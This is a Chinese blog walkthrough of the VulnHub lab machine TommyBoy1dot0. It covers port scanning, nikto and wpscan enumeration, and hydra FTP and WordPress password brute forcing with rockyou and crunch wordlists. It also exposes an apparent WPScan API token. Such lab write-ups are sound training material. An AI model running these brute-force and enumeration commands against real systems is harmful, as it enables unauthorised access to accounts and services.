vulnhub靶机练习之TommyBoy1dot0

搭建靶机环境

攻击机

攻击机IP查询

root@kali:~# ip addr show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b5:c3:a6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.80.123/24 brd 192.168.80.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:feb5:c3a6/64 scope link 
       valid_lft forever preferred_lft forever

使用arp-scan -l探测靶机IP，我们发现靶机的IP是192.168.80.13。

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.80.1	00:50:56:c0:00:08	VMware, Inc.
192.168.80.2	00:50:56:fc:96:a7	VMware, Inc.
192.168.80.13	00:0c:29:36:78:84	VMware, Inc.
192.168.80.254	00:50:56:fa:63:60	VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 1.962 seconds (130.48 hosts/sec). 4 responded

使用masscan探测开启的端口信息

root@kali:~# masscan -p1-65535 192.168.80.13/32 --rate=10000                 

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-18 10:52:45 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 192.168.80.13                                   
Discovered open port 80/tcp on 192.168.80.13                                   
Discovered open port 8008/tcp on 192.168.80.13

接下来使用nmap深度扫描，发现端口对应的服务是22端口：ssh、80和8008端口：http。

root@kali:~# nmap 192.168.80.13 -p22,80,8008
Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-18 19:00 CST
Nmap scan report for 192.168.80.13
Host is up (0.00045s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8008/tcp open  http
MAC Address: 00:0C:29:36:78:84 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

使用nikto扫描web漏洞
nikto是什么？参考资料

NIKTO:perl语言开发的开源WEB安全扫描器；识别网站软件版本；搜索存在安全隐患的文件；检查服务器配置漏洞；检查WEB Application层面的安全隐患；避免404误判依据响应文件内容判断，不同扩展名的文件404响应内容不同。

扫描80端口，发现了重要信息

命令用法：
nikto -host 192.168.80.13 -port 80

+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /aspnet_client over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 498, size: 5371fb88ff1d8, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD

从输出结果中找到以上关键信息，发现网站存在这个入口/flag-numero-uno.txt，于是到浏览器输入url地址：http://192.168.80.13/flag-numero-uno.txt获取到第一个flag：Flag data: B34rcl4ws。

6. 查看网页源码，找到关键信息，blog

要找到公司博客，得先看一个youtube视频：https://www.youtube.com/watch?v=VUxOd4CszJ8。这个视频就一句话「Hey, prestoricforest」，猜测这个公司博客的url地址是http://192.168.80.13/prehistoricforest/

7. 进入博客，我们发现第一篇博客的回复里面有flag提示信息：Flag #2: thisisthesecondflagyayyou.txt

于是我们通过提示，输入url：http://192.168.80.13/prehistoricforest/thisisthesecondflagyayyou.txt得到第二个flag：Flag data: Z4l1nsky

8. 进入son of A这篇博客，找到新的信息提示

提示1：带锁的那篇博客的密码在这个目录：http://192.168.80.13/richard里面找。

把这张图片下载到本地，exif这张图片，获得一串md5代码：ce154b5a8e59c89732bc25d6a2e6b90b。

使用在线工具解密这串md5，得到的结果是：spanky，这就是那篇加密博客的访问密码了。

使用密码访问这篇博客。

用hydra对ftp账号nickburns做暴力破解，获取到密码：nickburns。–但是我并没扫描出65534端口:/
原来是这个端口的服务不稳定，时断时开。

root@kali:~# hydra -e nsr -l nickburns ftp://192.168.80.13:65534/
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-18 20:13:54
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking ftp://192.168.80.13:65534/
[65534][ftp] host: 192.168.80.13   login: nickburns   password: nickburns
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-18 20:13:57

输入用户名和密码登录ftp服务：

root@kali:~# ftp 192.168.80.13 65534
Connected to 192.168.80.13.
220 Callahan_FTP_Server 1.3.5
Name (192.168.80.13:root): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

查看这个ftp服务有哪些文件，可以看到有个readme.txt，我们把它get到本地。

ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 nickburns nickburns      977 Jul 15  2016 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful
150 Opening BINARY mode data connection for readme.txt (977 bytes)
226 Transfer complete
977 bytes received in 0.10 secs (9.7746 kB/s)
ftp> bye
221 Goodbye.

我们看一下这个readme.txt写的啥，这里提示我们，有重要的信息放在NickIzL33t这个子目录。

root@kali:~# cat readme.txt 
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto.  HAHAHAHAHAAH! SUCKER!  This is the worst job ever!  You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!

Anyway I'm not completely without mercy.  There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years.  Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well.  But guess what?
He always forgets THAT password as well.  Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick

于是我们访问这个url：http://192.168.80.13:8008/NickIzL33t，看到这样的结果。

当我们使用插件User-Agent Switcher and Manager修改UA为IOS时，页面显示结果变成这样：

这是在提示我们要获取这个网站的密码，要找到一个html文件。于是我们爆破目录，去寻找相关的html。
思路1：使用burpsuite爆破
payload：

GET /NickIzL33t/§page§.html HTTP/1.1
Host: 192.168.1.15:8008
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 15 Jul 2016 02:11:27 GMT
If-None-Match: "10e-537a322dc0ba6-gzip"
Cache-Control: max-age=0

思路2：使用DirBuster爆破
DirBuster用法

思路3：使用dirb爆破（没成功）

dirb http://192.168.80.13:8008/NickIzL33t/ /usr/share/wordlists/rockyou.txt -a "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" -X .html

思路4：使用wfuzz爆破
wfuzz常见用法

wfuzz -Z -c -v -w /usr/share/wordlists/rockyou.txt -H "User-Agent:Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" --hc 404 http://192.168.80.13:8008/NickIzL33t/FUZZ.html

字典文件存在空格导致程序报错😭😭😭😭😭😭太难受了……

使用crunch生成密码字典：

1	crunch 13 13 -t bev,%%@@^1995 -o tommy.txt

接下来我们用wpscan --url http://192.168.80.13/prehistoricforest --enumerate u --api-token XLupJiXSlrJM4j1tUKggDoVYGzR7VqB9fsevFf9sfn0来暴力破解网站的用户名。
得出结果：

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <===================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] tommy
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] richard
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Tom Jr.
 | Found By: Rss Generator (Passive Detection)

[+] Big Tom
 | Found By: Rss Generator (Passive Detection)

[+] michelle
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

解压rockyou.txt.gz这个压缩包，使用该字典进行暴力破解。
kali@kali:/usr/share/wordlists$ sudo gzip -d rockyou.txt.gz，注意这里要使用sudo权限。

~~暴力破解待续……~~

继续使用wpscan暴力破解wordpress登录密码。太不容易了，找了好久才找到wpscan3.0以上版本的使用方法，参考文章。爆破tom的密码，爆出的密码是：tomtom1。可能没有人像我这样花两天时间爆破这么一个简单的密码😥

kali@kali:~$ sudo wpscan --url http://192.168.80.13/prehistoricforest/ --usernames tom --passwords /usr/share/wordlists/rockyou.txt --api-token XLupJiXSlrJM4j1tUKggDoVYGzR7VqB9fsevFf9sfn0 --max-threads 100
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.80.13/prehistoricforest/
[+] Started: Thu Feb 20 03:29:20 2020

Interesting Finding(s):

[+] http://192.168.80.13/prehistoricforest/
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.80.13/prehistoricforest/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.80.13/prehistoricforest/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.80.13/prehistoricforest/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.5.20 identified (Latest, released on 2019-12-12).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.80.13/prehistoricforest/index.php/feed/, <generator>https://wordpress.org/?v=4.5.20</generator>
 |  - http://192.168.80.13/prehistoricforest/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.5.20</generator>

[+] WordPress theme in use: twentysixteen
 | Location: http://192.168.80.13/prehistoricforest/wp-content/themes/twentysixteen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://192.168.80.13/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.0
 | Style URL: http://192.168.80.13/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.20
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.80.13/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.20, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:03 <=============================> (21 / 21) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
Error: Server error, try reducing the number of threads.                                                  
Trying tom / tomtom1 Time: 00:06:20 <=============================> (24700 / 24700) 100.00% Time: 00:06:20
[SUCCESS] - tom / tomtom1                                                                                 

[i] Valid Combinations Found:
 | Username: tom, Password: tomtom1

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 44

[+] Finished: Thu Feb 20 03:37:19 2020
[+] Requests Done: 24772
[+] Cached Requests: 5
[+] Data Sent: 8.24 MB
[+] Data Received: 107.827 MB
[+] Memory used: 1.162 GB
[+] Elapsed time: 00:07:59

wpscan参数说明
- --url：wordpress网站的登录地址。
- --passwords：密码字典文件，这里我们使用kali自带的rockyou.txt字典。
- --usernames：可以是单个用户名，或者用户名字典文件。
- --max-threads：设置最大线程数，默认值是5（太小了，可能要暴力破解到世界毁灭），设置为100。
- --api-token：自己在wpscan官网申请的唯一的api token值，一天有50次免费使用机会。